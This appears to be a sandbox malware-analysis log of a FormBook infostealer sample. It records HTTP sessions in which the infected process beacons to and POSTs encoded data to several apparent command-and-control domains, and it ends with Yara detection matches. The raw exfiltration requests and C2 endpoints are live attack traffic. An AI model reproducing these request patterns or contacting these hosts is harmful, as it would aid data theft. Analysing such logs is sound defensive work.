Oct 10, 2024 14:47:51.237350941 CEST | 486 | OUT | GET /wzoz/?Sh=Ppcgdv6DrtqpILZ3xPy0g9msApc+gUIN/EMWlKKGCKnUGKGSiYq02Q3K9hPbzriSr907/cLUuPH0KiO46gsbjuqN2MfoymjOpxTW14iCTowXcyBnLNm1v4w=&f6SpQ=_n84nZ4HGta HTTP/1.1
                                                                                                        Host: www.ainude2.cloud
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
Oct 10, 2024 14:47:51.684149981 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                        Server: hcdn
                                                                                                        Date: Thu, 10 Oct 2024 12:47:51 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 10072
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        x-hcdn-request-id: 17bfed56805bac1693ceacd8d2b2f948-bos-edge4
                                                                                                        Expires: Thu, 10 Oct 2024 12:47:50 GMT
                                                                                                        Cache-Control: no-cache
                                                                                                        Accept-Ranges: bytes
                                                                                                        Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        29 | 192.168.2.4 | 50033 | 109.234.166.180 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Oct 10, 2024 14:47:56.819595098 CEST | 769 | OUT
                                                                                                        POST /99um/ HTTP/1.1
                                                                                                        Host: www.yourtech-agency.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.yourtech-agency.com
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 199
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.yourtech-agency.com/99um/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=hcLLCavLj0j+D4tvS1QQUepauOICx/3SAGsgtEMcEg2mBhl8YQb2ZWC23Dw9s3mYipml3Byj7M7B7eStw/vsC0zNGKe3z+dgJ4MUrmhvoL10V2iZ+RcTNGMCr6wuaiqTXZvcDYEa5woHGS/plEUTHLUiqe5hClA/UMv5iFNZE+KbKG7eadePKoVsFh21ag9ziA==
                                                                                                        Oct 10, 2024 14:47:57.431843042 CEST | 672 | IN
                                                                                                        HTTP/1.1 307 Temporary Redirect
                                                                                                        Date: Thu, 10 Oct 2024 12:47:56 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                        referer-policy: same-origin
                                                                                                        set-cookie: o2s-chl=6f46695530e53f853ddf7fd7ae2c44af; domain=.yourtech-agency.com; expires=Fri, 11-Oct-24 12:47:56 GMT; path=/; SameSite=Lax; HttpOnly
                                                                                                        location: http://www.yourtech-agency.com/99um/
                                                                                                        tiger-protect-security: https://faq.o2switch.fr/hebergement-mutualise/tutoriels-cpanel/tiger-protect
                                                                                                        Server: o2switch-PowerBoost-v3
                                                                                                        Data Raw: 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 10


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        30 | 192.168.2.4 | 50034 | 109.234.166.180 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Oct 10, 2024 14:47:59.374453068 CEST | 789 | OUT
                                                                                                        POST /99um/ HTTP/1.1
                                                                                                        Host: www.yourtech-agency.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.yourtech-agency.com
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 219
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.yourtech-agency.com/99um/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=hcLLCavLj0j+DYxvXS8QS+pZtOIC7f3eAGwgtA9ZFWumYA58ZRb2YWC28jw0jXmRipab3AOj7M/B7eCtwMXtQUzDOqex3+dgJ4MUriJVoKR0UGyZvD0ST2MFiawuQCqXXZu5DZY8520HGXDplQAQQbUkue4oE0ZLQfWClXk6Lv+ELAqELs/YYoxfYm/BXjA65GjkM3Ng6BHgLHHhQWD2W4Q=
                                                                                                        Oct 10, 2024 14:47:59.962954044 CEST | 672 | IN
                                                                                                        HTTP/1.1 307 Temporary Redirect
                                                                                                        Date: Thu, 10 Oct 2024 12:47:58 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                        referer-policy: same-origin
                                                                                                        set-cookie: o2s-chl=6f46695530e53f853ddf7fd7ae2c44af; domain=.yourtech-agency.com; expires=Fri, 11-Oct-24 12:47:58 GMT; path=/; SameSite=Lax; HttpOnly
                                                                                                        location: http://www.yourtech-agency.com/99um/
                                                                                                        tiger-protect-security: https://faq.o2switch.fr/hebergement-mutualise/tutoriels-cpanel/tiger-protect
                                                                                                        Server: o2switch-PowerBoost-v3
                                                                                                        Data Raw: 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 10


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        31 | 192.168.2.4 | 50035 | 109.234.166.180 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Oct 10, 2024 14:48:01.973875999 CEST | 10871 | OUT
                                                                                                        POST /99um/ HTTP/1.1
                                                                                                        Host: www.yourtech-agency.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.yourtech-agency.com
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 10299
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.yourtech-agency.com/99um/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=hcLLCavLj0j+DYxvXS8QS+pZtOIC7f3eAGwgtA9ZFWWmEid8Yyz2CWC2iTw5jXnDit3c3ACd7O3B64Othp7tbUzDCKewz+dPJ8gQrmtVoKR0UE6ZvRcSR2MCr6wiaiq/XZ2PDYsz+AEHGzfpgjoQPrUmg+4wE0lUQfL5lX9VLvKEJU2TQM/YBYwZFVPlZEgU5kPmFyI+kxXfFw20UXC1S9u4AbXkar8GOCcZT6Kn+hnflDyxGt7+dA0zG5Z+glu64ncvMQMfChpKdK9B+dF+uR5rbrv3NJ+dRT5E7d7b9fICHKDsroRcwwCHewkxwzMV4fckgamzN/f9BRhoAqCv5dxLlNd7sHk98DRk5ulS/rlHLDfbtg+62OGulhv4vi/t0i+gun+rXtyByqshfFv8wmO+lH7fMq7xr9iWenGkANJ0C3OH37uIAo8U6XSb+IDiBreOS6etHt+4d54U9AivRHlLE9piMMR/M/MaX510dW84nKqZnN9Q4nR3bDcIFqY8a76ScmjgaaDaKCpCZ9YyK5A7xLHijgdNQbClzjdeVCwge+dy/nIRaek3ioS79IczJqQf9Xv5ku5RsHhWhVeQIN0Oq8OJv32hOvVkFcLqyoa0vbuuJzBaeY15mHEr0kvLy3IKn2kpDEI9FPnuT7OZTb3Akc744aFDIqyQw8erdDqGWtPVA2S2gH3L3KvqOrSCzEw6i2AJJN8189VXTh+8eqUdh+V4+whgyu2UZZ3uwbBzhp8V2sq/0hMCgwMIVgDyCpMUzm3Hwmj+5Vb0w/1ZTXcsYHYWi0karv38xIFw454+vTsbftkUrHGmh8KPcsARzH6pAyB1nnLqnfAW8w2zoNi2CtYvTCL03nfsp2diOqLHrXk82ST+5VZHTlmmoyrjM1J89bHw9iihS1vdTSPyoQHzlsz6wKDEe0Lv2i5hu3q7ML/a2uhr3sEbHvogVkT+NY85ftWHRT74vAZ5KOg6M5SMUhhaZWbD4rSovtBsy7m72DIYg [TRUNCATED]
                                                                                                        Oct 10, 2024 14:48:02.585396051 CEST | 672 | IN
                                                                                                        HTTP/1.1 307 Temporary Redirect
                                                                                                        Date: Thu, 10 Oct 2024 12:48:01 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                        referer-policy: same-origin
                                                                                                        set-cookie: o2s-chl=6f46695530e53f853ddf7fd7ae2c44af; domain=.yourtech-agency.com; expires=Fri, 11-Oct-24 12:48:01 GMT; path=/; SameSite=Lax; HttpOnly
                                                                                                        location: http://www.yourtech-agency.com/99um/
                                                                                                        tiger-protect-security: https://faq.o2switch.fr/hebergement-mutualise/tutoriels-cpanel/tiger-protect
                                                                                                        Server: o2switch-PowerBoost-v3
                                                                                                        Data Raw: 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 10


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        32 | 192.168.2.4 | 50036 | 109.234.166.180 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Oct 10, 2024 14:48:04.515564919 CEST | 492 | OUT
                                                                                                        GET /99um/?f6SpQ=_n84nZ4HGta&Sh=sejrBqbnhxLzIpZobXocfoJh7+Ax68vpI3pksmQcQlCqcURGXTbbLy2S/SU0nQLTr9eIuSCZyPnks+fy4cbgfRvRA7W8zuFue70e+ik0nvs8B1GRgQpORnQ= HTTP/1.1
                                                                                                        Host: www.yourtech-agency.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Oct 10, 2024 14:48:05.335777044 CEST | 486 | IN
                                                                                                        HTTP/1.1 301 Moved Permanently
                                                                                                        Date: Thu, 10 Oct 2024 12:48:04 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                        X-Redirect-By: WordPress
                                                                                                        Location: http://yourtech-agency.com/99um/?f6SpQ=_n84nZ4HGta&Sh=sejrBqbnhxLzIpZobXocfoJh7+Ax68vpI3pksmQcQlCqcURGXTbbLy2S/SU0nQLTr9eIuSCZyPnks+fy4cbgfRvRA7W8zuFue70e+ik0nvs8B1GRgQpORnQ=
                                                                                                        Server: o2switch-PowerBoost-v3


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        33 | 192.168.2.4 | 50037 | 3.33.130.190 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Oct 10, 2024 14:48:10.430226088 CEST | 757 | OUT
                                                                                                        POST /qyz6/ HTTP/1.1
                                                                                                        Host: www.mybodyradar.net
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.mybodyradar.net
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 199
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.mybodyradar.net/qyz6/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=RMX2YwK9YBtUiTOV2912felhFrmZ35PZhC26Gchp617JLDUbOpnoVCqwFtHubtEeL+Li47AQUdw2lTugWoUj0RV5Refl6bj3i0RtZc5uOUI//xkHehDaMCHMdA1xvQB0zKu1cycCPyfpmmZ0jdGf2fHe3KCQgUrrGEcZwmkpiT0E+ff0+GITJQH095HtI2pIFg==


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        34 | 192.168.2.4 | 50038 | 3.33.130.190 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Oct 10, 2024 14:48:13.069466114 CEST | 777 | OUT
                                                                                                        POST /qyz6/ HTTP/1.1
                                                                                                        Host: www.mybodyradar.net
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.mybodyradar.net
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 219
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.mybodyradar.net/qyz6/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=RMX2YwK9YBtUgzeV76p2O+licrmZl5PdhCq6GdUy6GPJLm4bPonoSCqwKNHhVNEVL+HA468QUd02lRGgWZUs1BVnZ+frlLj3i0RtZctUOUA/+EsHRkjdPCHDcA1x+gBwzKuHc39pPxnpmjl0jMGc4fHY5qDlmXyFHkVR/3gV8Cwr/ZOuv3pEbQjHg+OZF1UBeirfLjkGfy0eUktF+Pce8DU=


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        35 | 192.168.2.4 | 50039 | 3.33.130.190 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Oct 10, 2024 14:48:15.612699986 CEST | 10859 | OUT
                                                                                                        POST /qyz6/ HTTP/1.1
                                                                                                        Host: www.mybodyradar.net
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.mybodyradar.net
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 10299
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.mybodyradar.net/qyz6/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 50040 | 3.33.130.190 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:48:18.155544996 CEST | 488 | OUT | GET /qyz6/?Sh=cO/WbHS7dDlPjWOw24pePOdtBvzI7qrstwS5E88tqn3GEGw6O6zMXAiSEd+QRtw+ArL2+ZdGEPoP/wr/W49OxjdcbcDVqf77kjZAc/w1Hn9qnxIMaTPUER4=&f6SpQ=_n84nZ4HGta HTTP/1.1
                                                                                                        Host: www.mybodyradar.net
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
Oct 10, 2024 14:48:18.608920097 CEST | 396 | IN | HTTP/1.1 200 OK
                                                                                                        Server: openresty
                                                                                                        Date: Thu, 10 Oct 2024 12:48:18 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 256
                                                                                                        Connection: close
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Sh=cO/WbHS7dDlPjWOw24pePOdtBvzI7qrstwS5E88tqn3GEGw6O6zMXAiSEd+QRtw+ArL2+ZdGEPoP/wr/W49OxjdcbcDVqf77kjZAc/w1Hn9qnxIMaTPUER4=&f6SpQ=_n84nZ4HGta"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 51587 | 118.99.50.8 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:48:24.678086996 CEST | 742 | OUT | POST /uj7x/ HTTP/1.1
                                                                                                        Host: www.zt555.shop
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.zt555.shop
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 199
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.zt555.shop/uj7x/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=xqTvBRMI7WrLW9PdyWGO89Qns7/zZAR06D+abyjKpXfkwZZFvQViV8XNuLwmpJolFo9M5YXCYieNfM6SOIbiaDcjXPI3zOGbqxy2ed/cIAQ+tbKAhzEyz4yPIXOkcvtnqOFyPc5lf1WiwyCYudxkhW6KpEyQtOjJc/bPs070muSAICFIRC9No9BlsTRyYyQNeQ==
Oct 10, 2024 14:48:25.616406918 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Thu, 10 Oct 2024 12:48:25 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 548
                                                                                                        Connection: close
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 51588 | 118.99.50.8 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:48:27.224622965 CEST | 762 | OUT | POST /uj7x/ HTTP/1.1
                                                                                                        Host: www.zt555.shop
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.zt555.shop
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 219
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.zt555.shop/uj7x/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=xqTvBRMI7WrLXd/dh1+OstQ4jb/zQgRw6DyabznkpE3kw4pF9VhiS8XN67xtnpoqFoxE5YrCYhiNfOiSN/PtVzchfvI53OGbqxy2eeDyIE0+sraAgXQztIyIJXOkKftjqOFMPYhPf2uiwwaYtMxn0m623EzZ8cibCOzFlkvbtduHAkUSAzca69lWxUYGVxtEFZrobuJKgwgrB8jB7DHytyc=
Oct 10, 2024 14:48:28.080588102 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Thu, 10 Oct 2024 12:48:27 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 548
                                                                                                        Connection: close
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 51589 | 118.99.50.8 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:48:29.777321100 CEST | 10844 | OUT | POST /uj7x/ HTTP/1.1
                                                                                                        Host: www.zt555.shop
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.zt555.shop
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 10299
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.zt555.shop/uj7x/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
Oct 10, 2024 14:48:30.686443090 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Thu, 10 Oct 2024 12:48:30 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 548
                                                                                                        Connection: close
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 51590 | 118.99.50.8 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:48:32.314378977 CEST | 483 | OUT | GET /uj7x/?f6SpQ=_n84nZ4HGta&Sh=8o7PCltX/VPHe/nsrm2GraoW3Ln6cTBZ+TiwGxPZp0XU3O8CthtWROn8w6ZbnbkTCMdEyZnAfiGuFPjlC9agdmB/YOAJ3uSjrm6gafSyJ19b8vSngBVuvZk= HTTP/1.1
                                                                                                        Host: www.zt555.shop
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
Oct 10, 2024 14:48:33.197685003 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Thu, 10 Oct 2024 12:48:33 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 548
                                                                                                        Connection: close
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                        Target ID:0
                                                                                                        Start time:08:45:28
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Users\user\Desktop\NjjLYnPSZr.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\NjjLYnPSZr.exe"
                                                                                                        Imagebase:0xdf0000
                                                                                                        File size:283'648 bytes
                                                                                                        MD5 hash:8A6AA375BC5CA6EA45711462189103CB
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1971118603.0000000000D60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1971118603.0000000000D60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
